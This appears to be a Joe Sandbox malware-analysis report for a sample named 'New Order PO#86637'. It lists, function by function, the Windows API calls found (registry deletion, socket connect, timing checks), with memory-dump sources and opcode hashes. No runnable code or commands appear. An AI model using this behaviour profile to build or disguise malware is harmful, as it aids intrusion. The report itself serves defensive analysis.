                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfile$SectionWrite$String
                                                                            • String ID:
                                                                            • API String ID: 2832842796-0
                                                                            • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                            • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                            • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                            • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                            APIs
                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Enum$CloseDeleteOpen
                                                                            • String ID:
                                                                            • API String ID: 2095303065-0
                                                                            • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                            • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                            • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                            • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: RectWindow
                                                                            • String ID:
                                                                            • API String ID: 861336768-0
                                                                            • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                            • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                            • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                            • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                            APIs
                                                                            • SendMessageW.USER32 ref: 00449598
                                                                              • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                            • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                            • _wcslen.LIBCMT ref: 0044960D
                                                                            • _wcslen.LIBCMT ref: 0044961A
                                                                            • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$_wcslen$_wcspbrk
                                                                            • String ID:
                                                                            • API String ID: 1856069659-0
                                                                            • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                            • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                            • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                            • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 004478E2
                                                                            • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                            • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                            • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                            • TrackPopupMenuEx.USER32(009E64F0,00000000,00000000,?,?,00000000), ref: 00447991
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CursorMenuPopupTrack$Proc
                                                                            • String ID:
                                                                            • API String ID: 1300944170-0
                                                                            • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                            • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                            • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                            • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                            APIs
                                                                            • GetClientRect.USER32(?,?), ref: 004479CC
                                                                            • GetCursorPos.USER32(?), ref: 004479D7
                                                                            • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                            • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                            • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 1822080540-0
                                                                            • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                            • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                            • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                            • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                            • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                            • EndPaint.USER32(?,?), ref: 00447D13
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                            • String ID:
                                                                            • API String ID: 659298297-0
                                                                            • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                            • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                            • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                            • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                            APIs
                                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                              • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                              • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                              • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                              • Part of subcall function 00440D98: SendMessageW.USER32(009E1C00,000000F1,00000000,00000000), ref: 00440E6E
                                                                              • Part of subcall function 00440D98: SendMessageW.USER32(009E1C00,000000F1,00000001,00000000), ref: 00440E9A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnableMessageSend$LongShow
                                                                            • String ID:
                                                                            • API String ID: 142311417-0
                                                                            • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                            • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                            • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                            • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                            • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                            • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                            • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 00445879
                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                            • _wcslen.LIBCMT ref: 004458FB
                                                                            • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                            • String ID:
                                                                            • API String ID: 3087257052-0
                                                                            • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                            • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                            • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                            • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                            APIs
                                                                              • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                            • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                            • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 245547762-0
                                                                            • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                            • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                            • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                            • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                            APIs
                                                                            • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                            • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                            • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                            • BeginPath.GDI32(?), ref: 0044723D
                                                                            • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Select$BeginCreateDeletePath
                                                                            • String ID:
                                                                            • API String ID: 2338827641-0
                                                                            • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                            • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                            • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                            • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000), ref: 00434598
                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                            • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CounterPerformanceQuerySleep
                                                                            • String ID:
                                                                            • API String ID: 2875609808-0
                                                                            • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                            • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                            • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                            • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                            • MessageBeep.USER32(00000000), ref: 00460C46
                                                                            • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                            • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                            • String ID:
                                                                            • API String ID: 3741023627-0
                                                                            • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                            • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                            • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                            • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$DeleteObjectWindow$Icon
                                                                            • String ID:
                                                                            • API String ID: 4023252218-0
                                                                            • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                            • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                            • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                            • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                            • DeleteObject.GDI32(?), ref: 00455736
                                                                            • DeleteObject.GDI32(?), ref: 00455744
